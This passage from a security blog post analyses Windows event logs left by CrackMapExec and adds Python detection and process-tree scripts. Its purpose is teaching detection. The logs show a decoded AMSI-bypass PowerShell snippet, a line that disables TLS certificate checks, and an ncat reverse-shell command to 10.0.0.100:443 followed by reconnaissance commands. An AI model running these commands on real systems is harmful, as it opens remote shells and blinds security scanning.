Immediately after logon, we see below the "Administrator" account, under Logon ID "0xB48AC1", as the Target Subject of a new "cmd.exe" process (Event ID 4688). Two details matter here. First, the Creator Process is "C:\Windows\System32\wbem\WmiPrvSE.exe", the WMI Provider Host, and the Creator Subject is the machine account running as NETWORK SERVICE (S-1-5-20): the command was launched remotely through WMI, which is why it hangs off a network logon and why no share event from 10.0.0.100 pointed at it. Second, the "Process Command Line" uses the very file "Windows\Temp\kJpSGP" that the permission checks above were about. I find this command line interesting, so let's break it down.
Basically, the arguments to "cmd.exe" are as follows:
/Q - Turns command echoing off
/c - Carries out the command specified by the string and then terminates
cd \ - Changes to the root of the current drive, C:\ in this case; it produces no output, which makes it a cheap test that command execution works
1> \\127.0.0.1\C$\Windows\Temp\kJpSGP - Redirects standard output (whatever the command prints) to that file, written through the C$ administrative share on the loopback address rather than to a local path, so the remote operator can read the result back over SMB
2>&1 - Sends standard error to wherever standard output is going, i.e. to the file "kJpSGP"
Now that we know what the command is about, let's press ahead.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172550 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Process Information: New Process ID: 0xe00 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x12cc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1
We then see the "cmd.exe" process above creating the "conhost.exe" process below.
04/18/2019 01:32:44 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172551 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x1040 New Process Name: C:\Windows\System32\conhost.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xe00 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
We next see below activity from the loopback address (127.0.0.1) under Logon ID "0xB48AC1". This is the redirect in the command line above doing its work: "cmd.exe" writing its output to \\127.0.0.1\C$\Windows\Temp\kJpSGP goes through SMB, so it shows up as a share access from 127.0.0.1, the very address our first filter excluded. The access check is for READ_CONTROL (read the object's security descriptor), SYNCHRONIZE, WriteData, AppendData, WriteEA (write extended attributes), ReadAttributes and WriteAttributes: in other words, the rights needed to create and write the output file.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=5145 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Detailed File Share OpCode=Info RecordNumber=172566 Keywords=Audit Success Message=A network share object was checked to see whether client can be granted desired access. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Network Information: Object Type: File Source Address: 127.0.0.1 Source Port: 56094 Share Information: Share Name: \\*\C$ Share Path: \??\C:\ Relative Target Name: Windows\Temp\kJpSGP Access Request Information: Access Mask: 0x120196 Accesses: READ_CONTROL SYNCHRONIZE WriteData (or AddFile) AppendData (or AddSubdirectory or CreatePipeInstance) WriteEA ReadAttributes WriteAttributes Access Check Results:
Eventually, after some additional activity (which I've excluded for brevity), we see a PowerShell script being executed by a "cmd.exe" process. Please note this is not the same "cmd.exe" as above, but the activity is all related: another "cmd.exe" was created in the same way (by WmiPrvSE.exe, under the same Logon ID), and I did not see the point of showing again what was already shown above. If you have any concerns about this, do feel free to drop me a line.
As we look at the command line below, we see "powershell.exe" being executed with "-exec bypass -window hidden -noni -nop -encoded". We cannot read the script itself yet, because it is passed as an encoded argument.
04/18/2019 01:32:45 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=172584 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Process Information: New Process ID: 0xa74 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x12cc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA== 1> \\127.0.0.1\C$\Windows\Temp\RvhXCV 2>&1
The encoded argument above is nothing to worry about: "-encoded" is short for -EncodedCommand, which takes the script as base64 of its UTF-16LE text, so it can be decoded relatively easily. To do this, let's copy the following string into a text file.
WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0AcwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0AYwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA==
In my case I named the text file "securityNik-b64.encoded". Now that I have this file, I will leverage "certutil.exe" on my Windows 10 analysis machine, to decode this text.
c:\Users\Security Nik>certutil -decode -f c:\tmp\securityNik-b64.encoded c:\tmp\securityNik-b64.decoded
Input Length = 632
Output Length = 472
CertUtil: -decode command completed successfully.

c:\Users\Security Nik>type c:\tmp\securityNik-b64.decoded
[ N e t . S e r v i c e P o i n t M a n a g e r ] : : S e r v e r C e r t i f i c a t e V a l i d a t i o n C a l l b a c k   =   { $ t r u e } ; t r y {   [ R e f ] . A s s e m b l y . G e t T y p e ( ' S y s t e m . M a n a g e m e n t . A u t o m a t i o n . A m s i U t i l s ' ) . G e t F i e l d ( ' a m s i I n i t F a i l e d ' ,   ' N o n P u b l i c , S t a t i c ' ) . S e t V a l u e ( $ n u l l ,   $ t r u e ) } c a t c h { } g e t - p r o c e s s
Ahhhh! Finally, we are able to see above the command which was executed. It took us a while to get here but we did. No need to worry about the spaces between the characters: the script is UTF-16LE, 2 bytes (16 bits) per character, and "type" shows the zero high byte of each character as a space. Read through, the script first disables TLS certificate validation ([Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}), then, inside a try/catch, sets the private "amsiInitFailed" field of System.Management.Automation.AmsiUtils to $true, which makes AMSI believe it failed to initialise and so stops it scanning whatever runs next, and finally runs "get-process". The AMSI bypass is the part worth alerting on, whatever the final command happens to be.
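Both the decoding above and the pattern of the two 4688 events (a "cmd.exe" created by WmiPrvSE.exe with its output redirected to \\127.0.0.1\C$\Windows\Temp\...) are easy to automate. Here is an added example, not code from the original post or from CrackMapExec, that picks those 4688 events out of a set of exported log lines, pulls the -encoded argument out of the command line, decodes it as UTF-16LE (the reason certutil's output had the spaces) and tags the bypass strings we found. The two WMI 4688 lines are constructed, shortened copies of the ones shown above and reuse the post's base64 blob; the explorer.exe event is a made-up control that the rule must not flag.

```python
"""Flag WMI-launched cmd.exe with loopback share redirection and decode -encoded PowerShell."""
import base64
import re

# The -encoded argument from the 4688 event above (copied from the post, split for readability).
ENCODED_COMMAND = (
    "WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoA"
    "UwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4A"
    "QwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKAHQAcgB5AHsAIAAKAFsA"
    "UgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQA"
    "ZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBBAG0A"
    "cwBpAFUAdABpAGwAcwAnACkALgBHAGUAdABGAGkAZQBsAGQAKAAnAGEAbQBzAGkASQBuAGkA"
    "dABGAGEAaQBsAGUAZAAnACwAIAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMA"
    "JwApAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAIAAkAHQAcgB1AGUAKQAKAH0A"
    "YwBhAHQAYwBoAHsAfQAKAGcAZQB0AC0AcAByAG8AYwBlAHMAcwAKAA=="
)

# Constructed, shortened 4688 lines modelled on the events shown above; only the fields the rule
# reads are kept. The third one is a made-up control (a console opened from the desktop).
SAMPLE_4688 = [
    "EventCode=4688 Message=A new process has been created. Creator Subject: Account Name: SECNIK-2K19$ "
    "Logon ID: 0x3E4 Target Subject: Account Name: Administrator Logon ID: 0xB48AC1 "
    "New Process Name: C:\\Windows\\System32\\cmd.exe Creator Process Name: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "Process Command Line: cmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\kJpSGP 2>&1",
    "EventCode=4688 Message=A new process has been created. Creator Subject: Account Name: SECNIK-2K19$ "
    "Logon ID: 0x3E4 Target Subject: Account Name: Administrator Logon ID: 0xB48AC1 "
    "New Process Name: C:\\Windows\\System32\\cmd.exe Creator Process Name: C:\\Windows\\System32\\wbem\\WmiPrvSE.exe "
    "Process Command Line: cmd.exe /Q /c powershell.exe -exec bypass -window hidden -noni -nop -encoded "
    + ENCODED_COMMAND + " 1> \\\\127.0.0.1\\C$\\Windows\\Temp\\RvhXCV 2>&1",
    "EventCode=4688 Message=A new process has been created. Creator Subject: Account Name: Administrator "
    "Logon ID: 0x5B3EF6 Target Subject: Account Name: - Logon ID: 0x0 "
    "New Process Name: C:\\Windows\\System32\\cmd.exe Creator Process Name: C:\\Windows\\explorer.exe "
    "Process Command Line: \"C:\\Windows\\system32\\cmd.exe\"",
]

# stdout redirected to an administrative share on the loopback address, as in the events above.
LOOPBACK_REDIRECT = re.compile(r"1>\s*\\\\127\.0\.0\.1\\(?:ADMIN|C)\$\\", re.IGNORECASE)
# powershell.exe accepts any of -e, -ec, -enc, -encoded, -encodedcommand (case-insensitive).
ENCODED_ARG = re.compile(r"(?<!\S)-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
INDICATORS = {
    "amsiInitFailed": "AMSI bypass (amsiInitFailed)",
    "ServerCertificateValidationCallback": "TLS certificate validation disabled",
}


def get(event, pattern):
    """First capture group of pattern in event, or '' when the label is absent."""
    m = re.search(pattern, event)
    return m.group(1) if m else ""


def decode_encoded_command(b64):
    """-EncodedCommand is base64 over the script's UTF-16LE text; decoding as UTF-16LE is what turns
    the 'spaced out' bytes certutil produced above back into readable PowerShell."""
    return base64.b64decode(b64).decode("utf-16-le")


def triage(events):
    """One finding per 4688 event in which WmiPrvSE.exe spawned cmd.exe with output redirected to an
    admin share over 127.0.0.1; any -encoded payload is decoded and checked for known bypass strings."""
    findings = []
    for event in events:
        if get(event, r"EventCode=(\d+)") != "4688":
            continue
        parent = get(event, r"Creator Process Name: (\S+)").lower()
        child = get(event, r"New Process Name: (\S+)").lower()
        cmdline = get(event, r"Process Command Line: (.*)$")
        if not (parent.endswith("\\wmiprvse.exe") and child.endswith("\\cmd.exe")
                and LOOPBACK_REDIRECT.search(cmdline)):
            continue
        finding = {
            "logon_id": get(event, r"Target Subject:.*?Logon ID: (0x[0-9A-Fa-f]+)"),
            "command_line": cmdline,
            "decoded": None,
            "indicators": [],
        }
        m = ENCODED_ARG.search(cmdline)
        if m:
            try:
                finding["decoded"] = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                finding["indicators"].append("undecodable -encoded argument")
            else:
                finding["indicators"] = [label for key, label in INDICATORS.items()
                                         if key in finding["decoded"]]
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_4688):
        print(f["logon_id"], f["indicators"] or "no encoded payload")
        if f["decoded"]:
            print(f["decoded"])
```

Run as a script it flags the two WMI-launched commands under Logon ID 0xB48AC1 and prints the decoded script for the second, with both the AMSI bypass and the certificate-validation indicators attached; the explorer.exe console is ignored. In Splunk the same three conditions become a search on EventCode=4688 with the creator process name ending in WmiPrvSE.exe, the new process name ending in cmd.exe, and a command line containing "127.0.0.1\C$" or "127.0.0.1\ADMIN$".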
Finally we see the account logoff for logon ID "0xB48AC1"
04/18/2019 01:33:01 AM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4634 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Logoff OpCode=Info RecordNumber=172622 Keywords=Audit Success Message=An account was logged off. Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0xB48AC1 Logon Type: 3
Good stuff! We solved that challenge.
Let's move on to the last part of this post, in which "ncat.exe" was executed, and see what we might be able to learn from those logs. As we go through this section, note that I'm leaving out some of the activities, as they are similar to what we have seen above: for example, accessing the share "\\*\C$", creating and deleting temporary files such as "Windows\Temp\HxuzLk", and process command lines such as "cmd.exe /Q /c cd 1> \\127.0.0.1\C$\Windows\Temp\HxuzLk 2>&1". Rather than repeat what is above, let's instead focus on the more relevant items.
We see below that, similar to the PowerShell command, when "ncat.exe" is executed, it
04/18/2019 11:09:49 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196801 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x426A10 Process Information: New Process ID: 0x8a8 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x1164 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\iKxsfQ 2>&1
At this point, since we have the log above, we are better off taking the logon ID "0x426A10" and searching for all activities associated with it. However, when I did this I did not find the "whoami" and "net users" log entries. As a result, I had to continue stepping through my logs, looking at the activities after the time above. As I stepped through, I recognized there were a number of logons and logoffs, which explains why I did not see the "whoami" under this session: every new session generates a new logon ID. However, these logons all display similar characteristics in the access they request and the files they create.
As I stepped through the logs, I realized I had hit the jackpot. Let's walk through this.
The next log is where it all begins. Let's build our tree.
From below, the "cmd.exe" process with PID "0xb94" was created by the "WmiPrvSE.exe" process with PID "0x1bc". The "cmd.exe" process has quite an interesting command line.
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196910 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-20 Account Name: SECNIK-2K19$ Account Domain: SECURITYNIK Logon ID: 0x3E4 Target Subject: Security ID: S-1-0-0 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Process Information: New Process ID: 0xb94 New Process Name: C:\Windows\System32\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x1bc Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1
As we look at the next log entry below, we see that "cmd.exe" with PID "0xb94" has spawned "conhost.exe" with PID "0xb4".
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196911 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xb4 New Process Name: C:\Windows\System32\conhost.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb94 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Continuing our log analysis, we see below that the "cmd.exe" process with PID "0xb94" now spawns "c:\tools\ncat.exe" with PID "0x9e8". We can also see the "ncat.exe" connecting to a device at 10.0.0.100 on port 443. Interesting!
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)
                                             -> ncat.exe (0x9e8)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196919 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x9e8 New Process Name: C:\Tools\ncat.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb94 Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443
Next we see the "ncat.exe" process with PID "0x9e8" spawning a shell, "cmd.exe", with PID "0xb4c".
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)
                                             -> ncat.exe (0x9e8) -> cmd.exe (0xb4c)
04/18/2019 11:11:28 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196925 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xb4c New Process Name: C:\Windows\SysWOW64\cmd.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x9e8 Creator Process Name: C:\Tools\ncat.exe Process Command Line: cmd.exe
Looking below, we now see the "cmd.exe" process with PID "0xb4c" spawning a process named "whoami.exe" with PID "0xe60".
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)
                                             -> ncat.exe (0x9e8) -> cmd.exe (0xb4c) -> whoami.exe (0xe60)
04/18/2019 11:11:48 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196959 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0xe60 New Process Name: C:\Windows\SysWOW64\whoami.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:\Windows\SysWOW64\cmd.exe Process Command Line: whoami
Next up, we see below the "cmd.exe" process with PID "0xb4c" executing the "net.exe" process with PID "0x13f0". Notice the command line for this is executing "net users".
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)
                                             -> ncat.exe (0x9e8) -> cmd.exe (0xb4c) -> whoami.exe (0xe60)
                                                                                    -> net.exe (0x13f0)
04/18/2019 11:11:55 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196966 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x13f0 New Process Name: C:\Windows\SysWOW64\net.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0xb4c Creator Process Name: C:\Windows\SysWOW64\cmd.exe Process Command Line: net users
Finally, we see the "net.exe" process with PID "0x13f0" spawning the "net1.exe" process with PID "0x570".
start -> WmiPrvSE (0x1bc) -> cmd.exe (0xb94) -> conhost.exe (0xb4)
                                             -> ncat.exe (0x9e8) -> cmd.exe (0xb4c) -> whoami.exe (0xe60)
                                                                                    -> net.exe (0x13f0) -> net1.exe (0x570)
04/18/2019 11:11:55 PM LogName=Security SourceName=Microsoft Windows security auditing. EventCode=4688 EventType=0 Type=Information ComputerName=SECNIK-2K19.securitynik.local TaskCategory=Process Creation OpCode=Info RecordNumber=196967 Keywords=Audit Success Message=A new process has been created. Creator Subject: Security ID: S-1-5-21-4078604576-3869073289-8028338-500 Account Name: Administrator Account Domain: SECURITYNIK Logon ID: 0x43115C Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x570 New Process Name: C:\Windows\SysWOW64\net1.exe Token Elevation Type: %%1936 Mandatory Label: S-1-16-12288 Creator Process ID: 0x13f0 Creator Process Name: C:\Windows\SysWOW64\net.exe Process Command Line: C:\Windows\system32\net1 users
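The tree we just built by hand can be built programmatically from the 4688 events, as an added Python example that is not from the original post: the sample events are constructed from the key fields of the entries shown above, and each event's Creator Process ID is matched against the New Process ID of an earlier event to link parent and child.

```python
import re
from collections import defaultdict

# Constructed sample: the seven 4688 events walked through above, trimmed to the
# fields a process tree needs and listed in RecordNumber (time) order.
EVENTS = [
    r"EventCode=4688 New Process ID: 0xb94 New Process Name: C:\Windows\System32\cmd.exe Creator Process ID: 0x1bc "
    r"Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe Process Command Line: cmd.exe /Q /c c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443 1> \\127.0.0.1\C$\Windows\Temp\vYsGjo 2>&1",
    r"EventCode=4688 New Process ID: 0xb4 New Process Name: C:\Windows\System32\conhost.exe Creator Process ID: 0xb94 "
    r"Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
    r"EventCode=4688 New Process ID: 0x9e8 New Process Name: C:\Tools\ncat.exe Creator Process ID: 0xb94 "
    r"Creator Process Name: C:\Windows\System32\cmd.exe Process Command Line: c:\tools\ncat.exe --nodns --exec cmd.exe 10.0.0.100 443",
    r"EventCode=4688 New Process ID: 0xb4c New Process Name: C:\Windows\SysWOW64\cmd.exe Creator Process ID: 0x9e8 "
    r"Creator Process Name: C:\Tools\ncat.exe Process Command Line: cmd.exe",
    r"EventCode=4688 New Process ID: 0xe60 New Process Name: C:\Windows\SysWOW64\whoami.exe Creator Process ID: 0xb4c "
    r"Creator Process Name: C:\Windows\SysWOW64\cmd.exe Process Command Line: whoami",
    r"EventCode=4688 New Process ID: 0x13f0 New Process Name: C:\Windows\SysWOW64\net.exe Creator Process ID: 0xb4c "
    r"Creator Process Name: C:\Windows\SysWOW64\cmd.exe Process Command Line: net users",
    r"EventCode=4688 New Process ID: 0x570 New Process Name: C:\Windows\SysWOW64\net1.exe Creator Process ID: 0x13f0 "
    r"Creator Process Name: C:\Windows\SysWOW64\net.exe Process Command Line: C:\Windows\system32\net1 users",
]


def field(line, name, pattern=r"\S+"):
    """Pull one 'Key: value' field out of a flattened 4688 message."""
    m = re.search(re.escape(name) + r": (" + pattern + ")", line)
    return m.group(1) if m else ""


def parse_4688(line):
    return {"pid": field(line, "New Process ID").lower(),
            "image": field(line, "New Process Name"),
            "ppid": field(line, "Creator Process ID").lower(),
            "parent": field(line, "Creator Process Name"),
            "cmdline": field(line, "Process Command Line", r".*")}


def build_tree(lines):
    """Link each event to its creator. Windows reuses PIDs, so on a long log key on (PID, time)."""
    nodes, children = {}, defaultdict(list)
    for ev in (parse_4688(l) for l in lines if "EventCode=4688" in l):
        nodes[ev["pid"]] = ev
        children[ev["ppid"]].append(ev["pid"])
    roots = [p for p in children if p not in nodes]  # creators never seen being created
    return nodes, children, roots


def render(nodes, children, pid, depth=0):
    """Indented '-> name (pid)' lines for the subtree rooted at pid."""
    ev = nodes.get(pid)
    image = ev["image"] if ev else nodes[children[pid][0]]["parent"]
    out = ["    " * depth + "-> " + image.rsplit("\\", 1)[-1] + " (" + pid + ")"]
    for child in children.get(pid, []):
        out += render(nodes, children, child, depth + 1)
    return out
```

Rendering from the root gives WmiPrvSE.exe at the top, cmd.exe (0xb94) beneath it with conhost.exe and ncat.exe as siblings, and whoami.exe and net.exe under the cmd.exe (0xb4c) that ncat.exe spawned.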
Ok! So now we have a reasonable amount of intelligence into how we can use our logs to see the activity CrackMapExec performs on a system. Obviously, you will need to have the appropriate level of logging in place to make the most of this.
See the rest of the posts below on how we do raw packet analysis leveraging "tshark", along with using tools such as Snort and Bro ... sorry, Zeek.
Posts in this series:
Having Fun with CrackMapExec
Having Fun with CrackMapExec - Log Analysis
Having Fun with CrackMapExec - Packet Analysis - CrackMapExec
Having Fun with CrackMapExec - Zeek (Bro) Analysis
Having Fun with CrackMapExec - Snort IDS/IPS Analysis